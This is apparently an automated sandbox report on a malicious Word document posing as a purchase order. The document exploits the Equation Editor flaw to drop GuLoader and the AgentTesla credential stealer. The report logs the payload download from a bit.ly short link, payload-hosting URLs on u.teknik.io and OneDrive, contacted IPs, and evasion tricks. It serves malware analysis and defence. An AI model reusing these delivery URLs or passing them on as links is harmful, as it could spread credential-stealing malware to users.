Play interactive tour

Edit tour

Analysis Report purchase order_2242021.doc

Overview

General Information

Sample Name:	purchase order_2242021.doc
Analysis ID:	357325
MD5:	f0c779ec7573308d5c5bbf15762391d5
SHA1:	6934649699360c8cf7a0d8dee37c994082268054
SHA256:	fe38000650bb91c8e0d5aee0a0bff8136d849d58dc6f7d9f35d33788abd9a799
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

Yara detected GuLoader

Connects to a URL shortener service

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Hides threads from debuggers

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Abnormal high CPU Usage

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Drops PE files

Drops PE files to the user directory

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

One or more processes crash

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2368 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

69577.exe (PID: 2484 cmdline: C:\Users\Public\69577.exe MD5: 5D2D34449323C67BA1F5EC7561DF2204)

RegAsm.exe (PID: 2464 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)

dw20.exe (PID: 2248 cmdline: dw20.exe -x -s 1612 MD5: FBA78261A16C65FA44145613E3669E6E)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 2464	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2464	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2484

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 67.199.248.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2368, TargetFilename: C:\Users\Public\69577.exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txt	ReversingLabs: Detection: 12%
Source: C:\Users\Public\69577.exe	ReversingLabs: Detection: 12%

Multi AV Scanner detection for submitted file

Show sources

Source: purchase order_2242021.doc	Virustotal: Detection: 43%			Perma Link
Source: purchase order_2242021.doc	ReversingLabs: Detection: 27%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 5.79.72.163:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.11:80

Networking:

Connects to a URL shortener service

Show sources

Source: unknown

DNS query: name: bit.ly

Source: Joe Sandbox View	IP Address: 67.199.248.11 67.199.248.11
Source: Joe Sandbox View	IP Address: 5.79.72.163 5.79.72.163

Source: global traffic

HTTP traffic detected: GET /3qO7045 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6618253-1CF8-4E74-AA78-05F4F57053A0}.tmp

Jump to behavior

Source: global traffic

Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	String found in binary or memory: http://JSQBKI.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: RegAsm.exe, 00000005.00000002.2351474503.00000000005BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: RegAsm.exe, 00000005.00000002.2351812250.0000000002750000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegAsm.exe, 00000005.00000002.2351812250.0000000002750000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmp	String found in binary or memory: https://cbzrfq.bl.files.1drv.com/
Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmp	String found in binary or memory: https://cbzrfq.bl.files.1drv.com/D
Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: https://cbzrfq.bl.files.1drv.com/y4mw_bU6RxcRDqG2orF_kxpFaZd0uY1XmxWWfx-XauAPJLaxLYBgtFEfSbIefZC0rnX
Source: RegAsm.exe, 00000005.00000002.2351474503.00000000005BD000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2351491082.00000000005D8000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=F57CEB019EB26E7D&resid=F57CEB019EB26E7D%21108&authkey=AN1oxHG
Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: 3qO7045[1].htm.2.dr	String found in binary or memory: https://u.teknik.io/PWua8.txt
Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

E-Banking Fraud:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txt			Jump to dropped file

Source: C:\Users\Public\69577.exe

Process Stats: CPU usage > 98%

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096AA5 NtProtectVirtualMemory,NtQueryInformationProcess,	5_2_00096AA5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096F2E LoadLibraryA,NtQueryInformationProcess,	5_2_00096F2E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00097007 NtQueryInformationProcess,	5_2_00097007
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00097013 NtQueryInformationProcess,	5_2_00097013
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0009705C NtQueryInformationProcess,	5_2_0009705C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00097081 NtQueryInformationProcess,	5_2_00097081
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00097097 NtQueryInformationProcess,	5_2_00097097
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_000970B2 NtQueryInformationProcess,	5_2_000970B2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_000970C9 NtQueryInformationProcess,	5_2_000970C9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0009710B NtQueryInformationProcess,	5_2_0009710B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00097151 NtQueryInformationProcess,	5_2_00097151
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0009717A NtQueryInformationProcess,	5_2_0009717A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00097190 NtQueryInformationProcess,	5_2_00097190
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_000971A9 NtQueryInformationProcess,	5_2_000971A9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_000971DE NtQueryInformationProcess,	5_2_000971DE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_000971F7 NtQueryInformationProcess,	5_2_000971F7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0009720F NtQueryInformationProcess,	5_2_0009720F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096A5F NtProtectVirtualMemory,	5_2_00096A5F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096A7D NtQueryInformationProcess,	5_2_00096A7D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096A7F NtQueryInformationProcess,	5_2_00096A7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0009729D NtQueryInformationProcess,	5_2_0009729D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096ABF NtQueryInformationProcess,	5_2_00096ABF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096AF6 NtQueryInformationProcess,	5_2_00096AF6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096B15 NtQueryInformationProcess,	5_2_00096B15
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096E84 NtQueryInformationProcess,	5_2_00096E84
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096F47 NtQueryInformationProcess,	5_2_00096F47
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096F75 NtQueryInformationProcess,	5_2_00096F75
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096FA1 NtQueryInformationProcess,	5_2_00096FA1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096FBD NtQueryInformationProcess,	5_2_00096FBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096FD8 NtQueryInformationProcess,	5_2_00096FD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0097B0BA NtQuerySystemInformation,	5_2_0097B0BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0097B089 NtQuerySystemInformation,	5_2_0097B089

Source: unknown

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1612

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@8/19@4/2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0097AF3E AdjustTokenPrivileges,		5_2_0097AF3E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0097AF07 AdjustTokenPrivileges,		5_2_0097AF07

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$rchase order_2242021.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCAAE.tmp

Jump to behavior

Source: C:\Users\Public\69577.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: purchase order_2242021.doc	Virustotal: Detection: 43%
Source: purchase order_2242021.doc	ReversingLabs: Detection: 27%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1612
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1612	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: purchase order_2242021.doc

Static file information: File size 1797651 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2464, type: MEMORY

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txt			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txt

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\69577.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
